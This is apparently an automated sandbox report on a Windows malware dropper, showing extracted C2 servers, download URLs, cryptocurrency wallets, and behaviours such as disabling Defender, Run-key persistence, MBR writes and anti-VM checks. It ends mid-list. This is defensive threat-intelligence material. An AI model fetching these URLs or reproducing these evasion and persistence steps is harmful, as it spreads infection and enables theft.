Analysis
-
max time kernel
150s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
10-04-2024 22:15
Static task
static1
Behavioral task
behavioral1
Sample
3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe
Resource
win7-20240221-en
General
-
Target
3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe
-
Size
12KB
-
MD5
55dba6e7aa4e8cc73415f4e3f9f6bdae
-
SHA1
87c9f29d58f57a5e025061d389be2655ee879d5d
-
SHA256
3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a
-
SHA512
f2eb91e812b2ba58c4309fd44edadc8977367c7d9d6214d7e70a0392ae8427d570746ae57cca68dc260901f664f2e8c6c5387118ff01d243abeb5680abe2a352
-
SSDEEP
192:vnpYaU28zxHdo4ZMgQl9q+4ua7HhdSbwxz1ULU87glpK/b26J4Uf1XXr5:vWZdoWMR96uaLhM6ULU870gJR
Malware Config
Extracted
https://trello.com/1/cards/660a48f3ed8f660125aa4d31/attachments/66153d5497afda6d323e73ae/download/5885.exe
Extracted
gcleaner
185.172.128.90
5.42.65.64
-
url_path
/advdlc.php
Extracted
phorphiex
http://185.215.113.66/
0xCa90599132C4D88907Bd8E046540284aa468a035
TRuGGXNDM1cavQ1AqMQHG8yfxP4QWVSMN6
qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r
XryzFMFVpDUvU7famUGf214EXD3xNUSmQf
LLeT2zkStY3cvxMBFhoWXkG5VuZPoezduv
rwc4LVd9ABpULQ1CuCpDkgX2xVB1fUijyb
48jYpFT6bT8MTeph7VsyzCQeDsGHqdQNc2kUkRFJPzfRHHjarBvBtudPUtParMkDzZbYBrd3yntWBQcsnVBNeeMbN9EXifg
15TssKwtjMtwy4vDLcLsQUZUD2B9f7eDjw85sBNVC5LRPPnC
17hgMFyLDwMjxWqw5GhijhnPdJDyFDqecY
ltc1qt0n3f0t7vz9k0mvcswk477shrxwjhf9sj5ykrp
3PMiLynrGVZ8oEqvoqC4hXD67B1WoALR4pc
3FerB8kUraAVGCVCNkgv57zTBjUGjAUkU3
DLUzwvyxN1RrwjByUPPzVMdfxNRPGVRMMA
t1J6GCPCiHW1eRdjJgDDu6b1vSVmL5U7Twh
stars125f3mw4xd9htpsq4zj5w5ezm5gags37yxxh6mj
bnb1epx67ne4vckqmaj4gwke8m322f4yjr6eh52wqw
bc1qmpkehfffkr6phuklsksnd7nhgx0369sxu772m3
bitcoincash:qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r
GBQJMXYXPRIWFMXIFJR35ZB7LRKMB4PHCIUAUFR3TKUL6RDBZVLZEUJ3
Extracted
lumma
https://appliedgrandyjuiw.shop/api
https://birdpenallitysydw.shop/api
https://cinemaclinicttanwk.shop/api
https://disagreemenywyws.shop/api
https://speedparticipatewo.shop/api
https://fixturewordbakewos.shop/api
https://colorprioritytubbew.shop/api
https://abuselinenaidwjuew.shop/api
https://methodgreenglassdatw.shop/api
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral2/files/0x0003000000021166-1627.dat family_xworm -
Modifies security service 2 TTPs 2 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "3" httpsgithub.comqtkitedefender-controlreleasesdownloadv1.5disable-defender.exe.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4" httpsgithub.comqtkitedefender-controlreleasesdownloadv1.5disable-defender.exe.exe -
Quasar payload 1 IoCs
resource yara_rule behavioral2/files/0x000e000000023390-374.dat family_quasar -
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 5572 created 2524 5572 RegAsm.exe 42 -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" http185.215.113.66newtpp.exe.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" http185.215.113.66newtpp.exe.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" http185.215.113.66newtpp.exe.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" 1002628022.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" 2770021532.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" 2770021532.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" 2770021532.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" http185.215.113.66newtpp.exe.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" 1002628022.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" 1002628022.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" 2770021532.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" http185.215.113.66newtpp.exe.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" 1002628022.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" 2770021532.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" http185.215.113.66newtpp.exe.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" 1002628022.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" 2770021532.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" 1002628022.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ http185.215.113.46costrandom.exe.exe -
Blocklisted process makes network request 6 IoCs
flow pid Process 109 2548 powershell.exe 148 5844 powershell.exe 152 6088 powershell.exe 155 2316 powershell.exe 174 5888 powershell.exe 199 5696 powershell.exe -
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 5456 netsh.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion http185.215.113.46costrandom.exe.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion http185.215.113.46costrandom.exe.exe -
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Control Panel\International\Geo\Nation httpguatemalacayerealestate.combatushkainte.exe.exe Key value queried \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Control Panel\International\Geo\Nation httpsfile-drop.ccD5d2a75Tester.exe.exe Key value queried \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Control Panel\International\Geo\Nation httpsfile-drop.ccD24e534svchost.exe.exe Key value queried \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Control Panel\International\Geo\Nation 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3297cda814fb30a725f976420f48da21.exe httpsdownload.oxy.stgetce736be0b00ea25a9155101e47dc9fd9Client.exe.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3297cda814fb30a725f976420f48da21.exe httpsdownload.oxy.stgetce736be0b00ea25a9155101e47dc9fd9Client.exe.exe -
Executes dropped EXE 36 IoCs
pid Process 1968 http185.215.113.66newtpp.exe.exe 3156 httpstrello.com1cards660a48f3ed8f660125aa4d31attachments6615472237acc15ca27cb4addownload58888885.exe.exe 2724 http185.215.113.66pei.exe.exe 3580 http185.196.8.137tesgs.exe.exe 3076 httpguatemalacayerealestate.combatushkainte.exe.exe 4552 httpra-ftp.ruimages1.jpg.exe 3728 http185.215.113.46negravegan.exe.exe 3528 http185.215.113.46costrandom.exe.exe 884 3013831348.exe 780 httproundcube.custommarinesvcs.comklounada.exe.exe 3824 1002628022.exe 3928 2770021532.exe 4336 httpstrello.com1cards660a48f3ed8f660125aa4d31attachments66153df02cfa1d750cac2cfcdownloadcccc.exe.exe 5300 httpfiles.offshore.catfxYvCG6c.exe.exe 5488 275354733.exe 5580 httpfiles.offshore.catDSKeOWN1.exe.exe 5868 httpsgithub.comqtkitedefender-controlreleasesdownloadv1.5disable-defender.exe.exe 5036 httpsgithub.comqtkitedefender-controlreleasesdownloadv1.5disable-defender.exe.exe 5180 1793913919.exe 4320 RuntimeBroker2.exe 5244 667029277.exe 1608 $embr-client.exe 4584 2321415439.exe 3088 RuntimeBroker2.exe 3840 3216420798.exe 5824 http88.218.61.2191234.exe.exe 5876 http185.172.128.59ISetup8.exe.exe 5284 http185.172.128.59ISetup2.exe.exe 5680 httpsfile-drop.ccD5d2a75Tester.exe.exe 6124 httpsfile-drop.ccD24e534svchost.exe.exe 4956 http88.218.61.2191111.exe.exe 5964 http88.218.61.219test2.exe.exe 2004 httpsdownload.oxy.stgetce736be0b00ea25a9155101e47dc9fd9Client.exe.exe 4960 http88.218.61.219555.exe.exe 5580 svchost.exe 3076 svchost.exe -
Identifies Wine through registry keys 2 TTPs 1 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Software\Wine http185.215.113.46costrandom.exe.exe -
resource yara_rule behavioral2/files/0x0007000000023371-195.dat vmprotect behavioral2/memory/780-223-0x0000000000020000-0x000000000090E000-memory.dmp vmprotect behavioral2/memory/780-222-0x0000000000020000-0x000000000090E000-memory.dmp vmprotect -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" http185.215.113.66newtpp.exe.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" 1002628022.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection httpsgithub.comqtkitedefender-controlreleasesdownloadv1.5disable-defender.exe.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" httpsgithub.comqtkitedefender-controlreleasesdownloadv1.5disable-defender.exe.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" http185.215.113.66newtpp.exe.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" http185.215.113.66newtpp.exe.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" 2770021532.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" 1002628022.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" 1002628022.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" 1002628022.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" 2770021532.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" 2770021532.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" 1002628022.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" http185.215.113.66newtpp.exe.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" 1002628022.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" http185.215.113.66newtpp.exe.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" 2770021532.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features httpsgithub.comqtkitedefender-controlreleasesdownloadv1.5disable-defender.exe.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" httpsgithub.comqtkitedefender-controlreleasesdownloadv1.5disable-defender.exe.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\DisableAntiSpyware = "1" httpsgithub.comqtkitedefender-controlreleasesdownloadv1.5disable-defender.exe.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" http185.215.113.66newtpp.exe.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" 1002628022.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" 2770021532.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" 2770021532.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" 2770021532.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" http185.215.113.66newtpp.exe.exe -
Adds Run key to start application 2 TTPs 9 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysdinrdvs.exe" http185.215.113.66newtpp.exe.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\syspplsvc.exe" 1002628022.exe Set value (str) \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Users\\Admin\\syspplsvc.exe" 1002628022.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Service = "C:\\Windows\\winakrosvsa.exe" 2770021532.exe Set value (str) \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Service = "C:\\Users\\Admin\\winakrosvsa.exe" 2770021532.exe Set value (str) \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\3297cda814fb30a725f976420f48da21 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\httpsdownload.oxy.stgetce736be0b00ea25a9155101e47dc9fd9Client.exe.exe\" .." httpsdownload.oxy.stgetce736be0b00ea25a9155101e47dc9fd9Client.exe.exe Set value (str) \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Users\\Admin\\sysdinrdvs.exe" http185.215.113.66newtpp.exe.exe Set value (str) \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker2 = "C:\\Users\\Admin\\AppData\\Local\\RuntimeBroker2.exe" powershell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\3297cda814fb30a725f976420f48da21 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\httpsdownload.oxy.stgetce736be0b00ea25a9155101e47dc9fd9Client.exe.exe\" .." httpsdownload.oxy.stgetce736be0b00ea25a9155101e47dc9fd9Client.exe.exe -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PHYSICALDRIVE0 httpra-ftp.ruimages1.jpg.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 3528 http185.215.113.46costrandom.exe.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 5300 set thread context of 0 5300 httpfiles.offshore.catfxYvCG6c.exe.exe PID 4776 set thread context of 5572 4776 powershell.exe 152 PID 1608 set thread context of 0 1608 $embr-client.exe -
Drops file in Windows directory 13 IoCs
description ioc Process File created C:\Windows\Logs\Ember-Rootkit\embr-rootkit.exe powershell.exe File opened for modification C:\Windows\Logs\Ember-Rootkit\embr-rootkit.exe powershell.exe File opened for modification C:\Windows\svchost.exe httpsfile-drop.ccD5d2a75Tester.exe.exe File opened for modification C:\Windows\syspplsvc.exe 1002628022.exe File created C:\Windows\winakrosvsa.exe 2770021532.exe File created C:\Windows\Logs\Ember-Rootkit\embr-rootkit.exe powershell.exe File created C:\Windows\svchost.exe httpsfile-drop.ccD5d2a75Tester.exe.exe File created C:\Windows\syspplsvc.exe 1002628022.exe File opened for modification C:\Windows\winakrosvsa.exe 2770021532.exe File created C:\Windows\Logs\Ember-Rootkit\embr-rootkit.exe powershell.exe File created C:\Windows\Logs\Ember-Rootkit\embr-rootkit.exe powershell.exe File created C:\Windows\sysdinrdvs.exe http185.215.113.66newtpp.exe.exe File opened for modification C:\Windows\sysdinrdvs.exe http185.215.113.66newtpp.exe.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 9 IoCs
pid pid_target Process procid_target 3888 3076 WerFault.exe 102 1456 3076 WerFault.exe 102 2124 3076 WerFault.exe 102 2636 3076 WerFault.exe 102 2256 3076 WerFault.exe 102 3632 3076 WerFault.exe 102 4448 3076 WerFault.exe 102 3928 3076 WerFault.exe 102 5484 5572 WerFault.exe 152 -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5688 schtasks.exe 5832 schtasks.exe 6112 schtasks.exe -
Delays execution with timeout.exe 4 IoCs
pid Process 5560 timeout.exe 3348 timeout.exe 6024 timeout.exe 5972 timeout.exe -
Kills process with taskkill 1 IoCs
pid Process 4336 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3156 httpstrello.com1cards660a48f3ed8f660125aa4d31attachments6615472237acc15ca27cb4addownload58888885.exe.exe 3156 httpstrello.com1cards660a48f3ed8f660125aa4d31attachments6615472237acc15ca27cb4addownload58888885.exe.exe 3528 http185.215.113.46costrandom.exe.exe 3528 http185.215.113.46costrandom.exe.exe 2548 powershell.exe 2548 powershell.exe 2548 powershell.exe 2692 powershell.exe 2692 powershell.exe 2692 powershell.exe 780 httproundcube.custommarinesvcs.comklounada.exe.exe 780 httproundcube.custommarinesvcs.comklounada.exe.exe 4776 powershell.exe 4776 powershell.exe 4776 powershell.exe 4652 powershell.exe 4652 powershell.exe 4652 powershell.exe 1576 powershell.exe 1576 powershell.exe 4336 httpstrello.com1cards660a48f3ed8f660125aa4d31attachments66153df02cfa1d750cac2cfcdownloadcccc.exe.exe 4336 httpstrello.com1cards660a48f3ed8f660125aa4d31attachments66153df02cfa1d750cac2cfcdownloadcccc.exe.exe 1912 powershell.exe 1912 powershell.exe 2256 powershell.exe 2256 powershell.exe 1912 powershell.exe 2256 powershell.exe 5384 powershell.exe 5384 powershell.exe 5500 powershell.exe 5500 powershell.exe 5384 powershell.exe 5500 powershell.exe 5868 httpsgithub.comqtkitedefender-controlreleasesdownloadv1.5disable-defender.exe.exe 5868 httpsgithub.comqtkitedefender-controlreleasesdownloadv1.5disable-defender.exe.exe 5844 powershell.exe 5844 powershell.exe 5036 httpsgithub.comqtkitedefender-controlreleasesdownloadv1.5disable-defender.exe.exe 5036 httpsgithub.comqtkitedefender-controlreleasesdownloadv1.5disable-defender.exe.exe 5844 powershell.exe 5572 RegAsm.exe 5572 RegAsm.exe 5888 dialer.exe 5888 dialer.exe 5888 dialer.exe 5888 dialer.exe 6088 powershell.exe 6088 powershell.exe 6088 powershell.exe 5684 powershell.exe 5684 powershell.exe 5684 powershell.exe 2788 powershell.exe 2788 powershell.exe 2316 powershell.exe 2316 powershell.exe 2788 powershell.exe 2316 powershell.exe 5888 powershell.exe 5888 powershell.exe 5888 powershell.exe 5696 powershell.exe 5696 powershell.exe -
Suspicious behavior: SetClipboardViewer 1 IoCs
pid Process 3824 1002628022.exe -
Suspicious use of AdjustPrivilegeToken 49 IoCs
description pid Process Token: SeDebugPrivilege 928 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe Token: SeDebugPrivilege 3156 httpstrello.com1cards660a48f3ed8f660125aa4d31attachments6615472237acc15ca27cb4addownload58888885.exe.exe Token: SeDebugPrivilege 2548 powershell.exe Token: SeDebugPrivilege 2692 powershell.exe Token: SeDebugPrivilege 4776 powershell.exe Token: SeDebugPrivilege 4652 powershell.exe Token: SeDebugPrivilege 4336 taskkill.exe Token: SeDebugPrivilege 1576 powershell.exe Token: SeDebugPrivilege 4336 httpstrello.com1cards660a48f3ed8f660125aa4d31attachments66153df02cfa1d750cac2cfcdownloadcccc.exe.exe Token: SeDebugPrivilege 1912 powershell.exe Token: SeDebugPrivilege 2256 powershell.exe Token: SeDebugPrivilege 5300 httpfiles.offshore.catfxYvCG6c.exe.exe Token: SeDebugPrivilege 5384 powershell.exe Token: SeDebugPrivilege 5500 powershell.exe Token: SeDebugPrivilege 5868 httpsgithub.comqtkitedefender-controlreleasesdownloadv1.5disable-defender.exe.exe Token: SeImpersonatePrivilege 5868 httpsgithub.comqtkitedefender-controlreleasesdownloadv1.5disable-defender.exe.exe Token: SeDebugPrivilege 5844 powershell.exe Token: SeDebugPrivilege 6088 powershell.exe Token: SeDebugPrivilege 1608 $embr-client.exe Token: SeDebugPrivilege 5684 powershell.exe Token: SeDebugPrivilege 2788 powershell.exe Token: SeDebugPrivilege 2316 powershell.exe Token: SeDebugPrivilege 5888 powershell.exe Token: SeDebugPrivilege 5696 powershell.exe Token: SeDebugPrivilege 5680 httpsfile-drop.ccD5d2a75Tester.exe.exe Token: SeDebugPrivilege 6124 httpsfile-drop.ccD24e534svchost.exe.exe Token: SeBackupPrivilege 5712 vssvc.exe Token: SeRestorePrivilege 5712 vssvc.exe Token: SeAuditPrivilege 5712 vssvc.exe Token: SeDebugPrivilege 2004 httpsdownload.oxy.stgetce736be0b00ea25a9155101e47dc9fd9Client.exe.exe Token: SeDebugPrivilege 4576 powershell.exe Token: SeDebugPrivilege 6124 httpsfile-drop.ccD24e534svchost.exe.exe Token: SeDebugPrivilege 6056 powershell.exe Token: SeDebugPrivilege 5580 svchost.exe Token: SeDebugPrivilege 3076 svchost.exe Token: SeDebugPrivilege 3076 svchost.exe Token: 33 2004 httpsdownload.oxy.stgetce736be0b00ea25a9155101e47dc9fd9Client.exe.exe Token: SeIncBasePriorityPrivilege 2004 httpsdownload.oxy.stgetce736be0b00ea25a9155101e47dc9fd9Client.exe.exe Token: SeDebugPrivilege 3076 svchost.exe Token: 33 2004 httpsdownload.oxy.stgetce736be0b00ea25a9155101e47dc9fd9Client.exe.exe Token: SeIncBasePriorityPrivilege 2004 httpsdownload.oxy.stgetce736be0b00ea25a9155101e47dc9fd9Client.exe.exe Token: 33 2004 httpsdownload.oxy.stgetce736be0b00ea25a9155101e47dc9fd9Client.exe.exe Token: SeIncBasePriorityPrivilege 2004 httpsdownload.oxy.stgetce736be0b00ea25a9155101e47dc9fd9Client.exe.exe Token: 33 2004 httpsdownload.oxy.stgetce736be0b00ea25a9155101e47dc9fd9Client.exe.exe Token: SeIncBasePriorityPrivilege 2004 httpsdownload.oxy.stgetce736be0b00ea25a9155101e47dc9fd9Client.exe.exe Token: 33 2004 httpsdownload.oxy.stgetce736be0b00ea25a9155101e47dc9fd9Client.exe.exe Token: SeIncBasePriorityPrivilege 2004 httpsdownload.oxy.stgetce736be0b00ea25a9155101e47dc9fd9Client.exe.exe Token: 33 2004 httpsdownload.oxy.stgetce736be0b00ea25a9155101e47dc9fd9Client.exe.exe Token: SeIncBasePriorityPrivilege 2004 httpsdownload.oxy.stgetce736be0b00ea25a9155101e47dc9fd9Client.exe.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 6124 httpsfile-drop.ccD24e534svchost.exe.exe 3076 svchost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 928 wrote to memory of 1968 928 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe 97 PID 928 wrote to memory of 1968 928 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe 97 PID 928 wrote to memory of 1968 928 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe 97 PID 928 wrote to memory of 3156 928 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe 98 PID 928 wrote to memory of 3156 928 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe 98 PID 928 wrote to memory of 3156 928 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe 98 PID 928 wrote to memory of 2724 928 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe 96 PID 928 wrote to memory of 2724 928 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe 96 PID 928 wrote to memory of 2724 928 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe 96 PID 928 wrote to memory of 3580 928 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe 100 PID 928 wrote to memory of 3580 928 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe 100 PID 928 wrote to memory of 3580 928 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe 100 PID 928 wrote to memory of 3076 928 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe 102 PID 928 wrote to memory of 3076 928 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe 102 PID 928 wrote to memory of 3076 928 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe 102 PID 3156 wrote to memory of 1536 3156 httpstrello.com1cards660a48f3ed8f660125aa4d31attachments6615472237acc15ca27cb4addownload58888885.exe.exe 103 PID 3156 wrote to memory of 1536 3156 httpstrello.com1cards660a48f3ed8f660125aa4d31attachments6615472237acc15ca27cb4addownload58888885.exe.exe 103 PID 3156 wrote to memory of 1536 3156 httpstrello.com1cards660a48f3ed8f660125aa4d31attachments6615472237acc15ca27cb4addownload58888885.exe.exe 103 PID 1536 wrote to memory of 2548 1536 cmd.exe 105 PID 1536 wrote to memory of 2548 1536 cmd.exe 105 PID 1536 wrote to memory of 2548 1536 cmd.exe 105 PID 928 wrote to memory of 4552 928 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe 106 PID 928 wrote to memory of 4552 928 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe 106 PID 928 wrote to memory of 4552 928 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe 106 PID 928 wrote to memory of 3528 928 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe 107 PID 928 wrote to memory of 3528 928 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe 107 PID 928 wrote to memory of 3528 928 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe 107 PID 928 wrote to memory of 3728 928 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe 108 PID 928 wrote to memory of 3728 928 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe 108 PID 928 wrote to memory of 3728 928 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe 108 PID 3580 wrote to memory of 2508 3580 http185.196.8.137tesgs.exe.exe 117 PID 3580 wrote to memory of 2508 3580 